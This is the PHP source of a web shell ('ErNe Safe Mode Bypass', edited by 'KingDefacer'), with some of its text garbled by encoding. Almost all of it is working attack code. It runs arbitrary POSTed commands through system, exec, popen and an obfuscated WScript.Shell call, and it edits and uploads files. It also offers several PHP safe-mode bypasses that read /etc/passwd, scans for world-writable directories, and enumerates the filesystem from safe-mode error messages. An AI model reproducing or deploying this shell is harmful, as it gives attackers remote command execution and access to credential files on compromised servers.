Ernealizm - Edited By KingDefacer

ErNe Safe Mode Bypass - Edited By KingDefacer

?╗?????? URL ?Ф?????н???з?░?м

"; exit; } if (empty($_POST['erne'] ) ) { }ELSE{ $action = '?action=erne'; echo "

"; exit; } if (empty($_POST['command'] ) ) { }ELSE{ if (substr(PHP_OS, 0, 3) == 'WIN') { $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe"; $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt"; echo "\n"; } $tb = new FORMS; $tb->tableheader(); $tb->tdbody('

'.$_SERVER['HTTP_HOST'].'

'.$mohajer.'

'.$_SERVER['REMOTE_ADDR'].'

','center','top'); $tb->tdbody(""); $tb->tablefooter(); $tb->tableheader(); $tb->tdbody('

command [ system , shell_exec , passthru , Wscript.Shell , exec , popen ]

','center','top'); $tb->tdbody('

'); $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen'); $tb->headerform(array('content'=>'cmd:'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit'))); echo"

";

        if  ($_POST['command'] )  {

		if ($execfunc=="system") {
			system($_POST['command']);
		} elseif ($execfunc=="passthru") {
			passthru($_POST['command']);
		} elseif ($execfunc=="exec") {
			$result = exec($_POST['command']);
			echo $result;
		} elseif ($execfunc=="shell_exec") {
			$result=shell_exec($_POST['command']);
			echo $result;
		} elseif ($execfunc=="popen") {
			$pp = popen($_POST['command'], 'r');
			$read = fread($pp, 2096);
			echo $read;
			pclose($pp);
		} elseif ($execfunc=="wscript") {
			$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
			$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
			$stdout = $exec->StdOut();
			$stroutput = $stdout->ReadAll();
			echo $stroutput;
		} else {
			system($_POST['command']);
		}

	}

echo"

"; exit; }//end shell if ($_POST['editfile']){ $fp = fopen($_POST['editfile'], "r"); $filearr = file($_POST['editfile']); foreach ($filearr as $string){ $content = $content . $string; } echo "

Edit file: $editfile

"; fclose($fp); } if($_POST['savefile']){ $fp = fopen($_POST['savefile'], "w"); $content = stripslashes($content); fwrite($fp, $content); fclose($fp); echo "

Successfully saved!

"; } if ($doupfile) { echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "?Щ???С?л?Ц?Щ?ДЦ?ж!" : "?Щ???С?л???з?░?м!"; } elseif (($createdirectory) AND !empty($_POST['newdirectory'])) { if (!empty($newdirectory)) { $mkdirs="$dir/$newdirectory"; if (file_exists("$mkdirs")) { echo "can't make dir"; } else { echo (@mkdir("$mkdirs",0777)) ? "ok" : ""; @chmod("$mkdirs",0777); } } } ///////// $pathname=str_replace('\\','/',dirname(__FILE__)); //////// if (!isset($dir) or empty($dir)) { $dir = "."; $nowpath = getPath($pathname, $dir); } else { $dir=$_post['dir']; $nowpath = getPath($pathname, $dir); } /////// $dir_writeable = (dir_writeable($nowpath)) ? "m" : "mm"; $phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : ""; $reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | " : ""; $tb = new FORMS; $tb->tableheader(); $tb->tdbody('

'.$_SERVER['HTTP_HOST'].'

'.$mohajer.'

'.$_SERVER['REMOTE_ADDR'].'

','center','top'); $tb->tdbody(""); $tb->tablefooter(); $tb->tableheader(); $tb->tdbody('

Dosya Duzenle Yada Olustur & Dosya Yukle & Dizin Olustur

','center','top'); $tb->tdbody('

'); $tb->headerform(array('content'=>'Dosya Duzenle weya Olustur:'.$tb->makehidden('dir', getcwd() ).' '.$tb->makeinput('editfile').' '.$tb->makeinput('Edit','Duzenle','','submit'))); $tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'Dosya Yukle:'.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','Ekle','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))); $tb->headerform(array('content'=>'Dizin Olustur: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','yenidizin','','submit'))); $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen'); $tb->headerform(array('content'=>'cmd:'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit'))); $tb->tdbody ("

"); if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { $tb->tableheader(); echo"DIRFirst dataLast dataSizePerm"; $dirs=@opendir($dir); $dir_i = '0'; while ($file=@readdir($dirs)) { $filepath="$dir/$file"; $a=@is_dir($filepath); if($a=="1"){ if($file!=".." && $file!=".") { $ctime=@date("Y-m-d H:i:s",@filectime($filepath)); $mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); $dirperm=substr(base_convert(fileperms($filepath),10,8),-4); echo "\n"; echo " [$file]\n"; echo " $ctime\n"; echo " $mtime\n"; echo " <dir>\n"; echo " $dirperm\n"; echo "\n"; $dir_i++; } else { if($file=="..") { echo "\n"; echo " Up dir\n"; echo "\n"; } } } }// while @closedir($dirs); echo"

"; $dirs=@opendir($dir); $file_i = '0'; while ($file=@readdir($dirs)) { $filepath="$dir/$file"; $a=@is_dir($filepath); if($a=="0"){ $size=@filesize($filepath); $size=$size/1024 ; $size= @number_format($size, 3); if (@filectime($filepath) == @filemtime($filepath)) { $ctime=@date("Y-m-d H:i:s",@filectime($filepath)); $mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); } else { $ctime="".@date("Y-m-d H:i:s",@filectime($filepath)).""; $mtime="".@date("Y-m-d H:i:s",@filemtime($filepath)).""; } @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4); echo "\n"; echo " "; echo ""; echo "$file\n"; if ($file == 'config.php') { echo "$file\n"; } echo " $ctime\n"; echo " $mtime\n"; echo " $size KB\n"; echo " $fileperm\n"; echo "\n"; $file_i++; } }// while @closedir($dirs); echo "\n"; echo "\n"; }// end dir function debuginfo() { global $starttime; $mtime = explode(' ', microtime()); $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6); echo "Processed in $totaltime second(s)"; } function stripslashes_array(&$array) { while(list($key,$var) = each($array)) { if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) { if (is_string($var)) { $array[$key] = stripslashes($var); } if (is_array($var)) { $array[$key] = stripslashes_array($var); } } } return $array; } function deltree($deldir) { $mydir=@dir($deldir); while($file=$mydir->read()) { if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { @chmod("$deldir/$file",0777); deltree("$deldir/$file"); } if (is_file("$deldir/$file")) { @chmod("$deldir/$file",0777); @unlink("$deldir/$file"); } } $mydir->close(); @chmod("$deldir",0777); return (@rmdir($deldir)) ? 1 : 0; } function dir_writeable($dir) { if (!is_dir($dir)) { @mkdir($dir, 0777); } if(is_dir($dir)) { if ($fp = @fopen("$dir/test.txt", 'w')) { @fclose($fp); @unlink("$dir/test.txt"); $writeable = 1; } else { $writeable = 0; } } return $writeable; } function getrowbg() { global $bgcounter; if ($bgcounter++%2==0) { return "firstalt"; } else { return "secondalt"; } } function getPath($mainpath, $relativepath) { global $dir; $mainpath_info = explode('/', $mainpath); $relativepath_info = explode('/', $relativepath); $relativepath_info_count = count($relativepath_info); for ($i=0; $i<$relativepath_info_count; $i++) { if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue; if ($relativepath_info[$i] == '..') { $mainpath_info_count = count($mainpath_info); unset($mainpath_info[$mainpath_info_count-1]); continue; } $mainpath_info[count($mainpath_info)] = $relativepath_info[$i]; } return implode('/', $mainpath_info); } function getphpcfg($varname) { switch($result = get_cfg_var($varname)) { case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break; } } function getfun($funName) { return (false !== function_exists($funName)) ? "Yes" : "No"; } class PHPZip{ var $out=''; function PHPZip($dir) { if (@function_exists('gzcompress')) { $curdir = getcwd(); if (is_array($dir)) $filelist = $dir; else{ $filelist=$this -> GetFileList($dir);//???Ф?????С? ?▒?? foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1); } if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir); else chdir($curdir); if (count($filelist)>0){ foreach($filelist as $filename){ if (is_file($filename)){ $fd = fopen ($filename, "r"); $content = @fread ($fd, filesize ($filename)); fclose ($fd); if (is_array($dir)) $filename = basename($filename); $this -> addFile($content, $filename); } } $this->out = $this -> file(); chdir($curdir); } return 1; } else return 0; } function GetFileList($dir){ static $a; if (is_dir($dir)) { if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if($file!='.' && $file!='..'){ $f=$dir .'/'. $file; if(is_dir($f)) $this->GetFileList($f); $a[]=$f; } } closedir($dh); } } return $a; } var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } // end if return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode('', $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; } } function sqldumptable($table, $fp=0) { $tabledump = "DROP TABLE IF EXISTS $table;\n"; $tabledump .= "CREATE TABLE $table (\n"; $firstfield=1; $fields = mysql_query("SHOW FIELDS FROM $table"); while ($field = mysql_fetch_array($fields)) { if (!$firstfield) { $tabledump .= ",\n"; } else { $firstfield=0; } $tabledump .= " $field[Field] $field[Type]"; if (!empty($field["Default"])) { $tabledump .= " DEFAULT '$field[Default]'"; } if ($field['Null'] != "YES") { $tabledump .= " NOT NULL"; } if ($field['Extra'] != "") { $tabledump .= " $field[Extra]"; } } mysql_free_result($fields); $keys = mysql_query("SHOW KEYS FROM $table"); while ($key = mysql_fetch_array($keys)) { $kname=$key['Key_name']; if ($kname != "PRIMARY" and $key['Non_unique'] == 0) { $kname="UNIQUE|$kname"; } if(!is_array($index[$kname])) { $index[$kname] = array(); } $index[$kname][] = $key['Column_name']; } mysql_free_result($keys); while(list($kname, $columns) = @each($index)) { $tabledump .= ",\n"; $colnames=implode($columns,","); if ($kname == "PRIMARY") { $tabledump .= " PRIMARY KEY ($colnames)"; } else { if (substr($kname,0,6) == "UNIQUE") { $kname=substr($kname,7); } $tabledump .= " KEY $kname ($colnames)"; } } $tabledump .= "\n);\n\n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } $rows = mysql_query("SELECT * FROM $table"); $numfields = mysql_num_fields($rows); while ($row = mysql_fetch_array($rows)) { $tabledump = "INSERT INTO $table VALUES("; $fieldcounter=-1; $firstfield=1; while (++$fieldcounter<$numfields) { if (!$firstfield) { $tabledump.=", "; } else { $firstfield=0; } if (!isset($row[$fieldcounter])) { $tabledump .= "NULL"; } else { $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'"; } } $tabledump .= ");\n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } } mysql_free_result($rows); } class FORMS { function tableheader() { echo "\n"; } function headerform($arg=array()) { global $dir; if ($arg[enctype]){ $enctype="enctype=\"$arg[enctype]\""; } else { $enctype=""; } if (!isset($arg[method])) { $arg[method] = "POST"; } if (!isset($arg[action])) { $arg[action] = ''; } echo " \n"; echo " \n"; echo " \n"; echo " \n"; echo " \n"; } function tdheader($title) { global $dir; echo " \n"; echo " \n"; echo " \n"; } function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') { if ($bgcolor=='2') { $css="secondalt"; } elseif ($bgcolor=='1') { $css="firstalt"; } else { $css=$bgcolor; } $height = empty($height) ? "" : " height=".$height; $colspan = empty($colspan) ? "" : " colspan=".$colspan; echo " \n"; echo " \n"; echo " \n"; } function tablefooter() { echo "

".$arg[content]."

".$title." [?╖mohajer]

".$content."

\n"; } function formheader($action='',$title,$target='') { global $dir; $target = empty($target) ? "" : " target=\"".$target."\""; echo "

\n"; echo " \n"; echo " ".$title." [?╖?╡?╗??]\n"; echo " \n"; } function makehidden($name,$value=''){ echo "\n"; } function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){ $css = ($css == 'input') ? " class=\"input\"" : ""; $input = "\n"; return $input; } function makeid($name,$value='',$extra='',$type='select',$size='30',$css='input'){ $css = ($css == 'input') ? " class=\"input\"" : ""; $input = ""; return $input; } function makeimp($name,$value='',$extra='',$type='select',$size='30',$css='input'){ $css = ($css == 'input') ? " class=\"input\"" : ""; $input = ""; return $input; } function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){ $textarea = "\n"; return $textarea; } function formfooter($over='',$height=''){ $height = empty($height) ? "" : " height=\"".$height."\""; echo " \n"; echo " \n"; echo " \n"; echo "

\n"; echo $end = empty($over) ? "" : "\n"; } function makeselect($arg = array()){ if ($arg[multiple]==1) { $multiple = " multiple"; if ($arg[size]>0) { $size = "size=$arg[size]"; } } if ($arg[css]==0) { $css = "class=\"input\""; } $select = "\n"; return $select; } } $tb->tableheader(); $tb->tdbody('

Exploit: read file [SQL , id , CURL , copy , ini_restore , imap] & Make file ERORR

','center','top'); $tb->tdbody('

'); $tb->headerform(array('content'=>'read file :
' .$tb->makeinput('Mohajer22','/etc/passwd' ).$tb->makeinput('',Show,'Mohajer22','submit'))); $tb->headerform(array('content'=>'read file id:
' .$tb->makeid('plugin','cat /etc/passwd' ).$tb->makeinput('',Show,'plugin','submit'))); $tb->headerform(array('content'=>'read file CURL:
' .$tb->makeinput('curl','/etc/passwd' ).$tb->makeinput('',Show,'curl','submit'))); $tb->headerform(array('content'=>'read file copy:
' .$tb->makeinput('copy','/etc/passwd' ).$tb->makeinput('',Show,'copy','submit'))); $tb->headerform(array('content'=>'read file ini_restore:
' .$tb->makeinput('M2','/etc/passwd' ).$tb->makeinput('',Show,'M2','submit'))); $tb->headerform(array('content'=>'read file or dir with imap:
' .$tb->makeimp('switch','/etc/passwd' ).$tb->makeinput('string','/etc/passwd' ).$tb->makeinput('string','Show','','submit'))); $tb->headerform(array('content'=>'Make file ERORR:
' .$tb->makeinput('ER','Mohajer22.php' ).$tb->makeinput('ER','Write','ER','submit'))); // read file SQL ( ) // if(empty($_POST['Mohajer22'])){ } else { echo "read file SQL","
" ; echo ""; } // ERORR // if(empty($_POST['ER'])){ } else { $ERORR=$_POST['ER']; echo error_log(" Exploit: error_log() By * erne *

By erne

", 3,$ERORR); } // id // if ($_POST['plugin'] ){ echo "read file id" ,"
"; echo ""; break; } // CURL // if(empty($_POST['curl'])){ } else { echo "read file CURL","
" ; echo ""; } // copy// $u1p=""; $tymczas=""; if(empty($_POST['copy'])){ } else { echo "read file copy" ,"
"; echo ""; } else { die("Sorry... File ".htmlspecialchars($u1p)." dosen't exists or you don't have access."); } } /// ini_restore // if(empty($_POST['M2'])){ } else { echo "read file ini_restore","
"; echo ""; } // imap // $string = !empty($_POST['string']) ? $_POST['string'] : 0; $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; if ($string && $switch == "file") { echo "read file imap" ,"
"; echo ""; } elseif ($string && $switch == "dir") { echo "read dir imap","
" ; echo ""; } $tb->tdbody ("

"); // open dir // $tb->tableheader(); $tb->tdbody('

Exploit: Open dir

','center','top'); $tb->tdbody('

'); if(empty($_POST['m'])){ echo "

"; } else { $m=$_POST['m']; $spath = $m ; $path = $m ; $method = intval(trim($_POST['method'])); $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file = readdir($handle))) { $full_path = "$path/$file"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0777')) { if (!file_exists('.*')) { $_folders[$i] = $file; $i++; } } } closedir($handle); clearstatcache(); echo 'The folders is 777 :
'; foreach ($_folders as $folder) { echo $folder.'
'; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0755')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 755 :
'; foreach ($_folders as $folder) { echo $folder.'
'; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0644')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 644 :
'; foreach ($_folders as $folder) { echo $folder.'
'; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0750')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 750 :
'; foreach ($_folders as $folder) { echo $folder.'
'; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0604')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 604 :
'; foreach ($_folders as $folder) { echo $folder.'
'; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0705')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 705 :
'; foreach ($_folders as $folder) { echo $folder.'
'; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0606')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 606 :
'; foreach ($_folders as $folder) { echo $folder.'
'; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0703')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 703 :
'; foreach ($_folders as $folder) { echo $folder.'
'; } } $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); $_folders[$i] = $file1; $i++; } clearstatcache(); echo 'www.alturks.com :
'; foreach ($_folders as $folder) { echo $folder.'
'; } echo 'ernealizm: '.$i.'
'; $tb->tdbody ("

"); $tb->tableheader(); $tb->tdbody('

Exploit: break fucking safe-mode

','center','top'); $tb->tdbody('

'); error_reporting(E_WARNING); ini_set("display_errors", 1); echo "".getcwd().""; echo ""; // break fucking safe-mode ! $root = "/"; if($_POST['root']) $root = $_POST['root']; if (!ini_get('safe_mode')) die("Safe-mode is OFF."); echo "

";
  $c = 0; $D = array();
  set_error_handler("eh");

$chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";

for($i=0; $i < strlen($chars); $i++){
  $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";

$prevD = $D[count($D)-1];
  glob($path."*");

if($D[count($D)-1] != $prevD){

for($j=0; $j < strlen($chars); $j++){

$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";

$prevD2 = $D[count($D)-1];
           glob($path."*");

if($D[count($D)-1] != $prevD2){

for($p=0; $p < strlen($chars); $p++){

$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";

$prevD3 = $D[count($D)-1];
                 glob($path."*");

if($D[count($D)-1] != $prevD3){

for($r=0; $r < strlen($chars); $r++){

$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
                       glob($path."*");

}

$D = array_unique($D);

foreach($D as $item) echo "{$item}\n";

function eh($errno, $errstr, $errfile, $errline){

global $D, $c, $i;
     preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
     if($o){ $D[$c] = $o[2]; $c++;}

}
  echo "

"; $tb->tdbody ("

"); ?>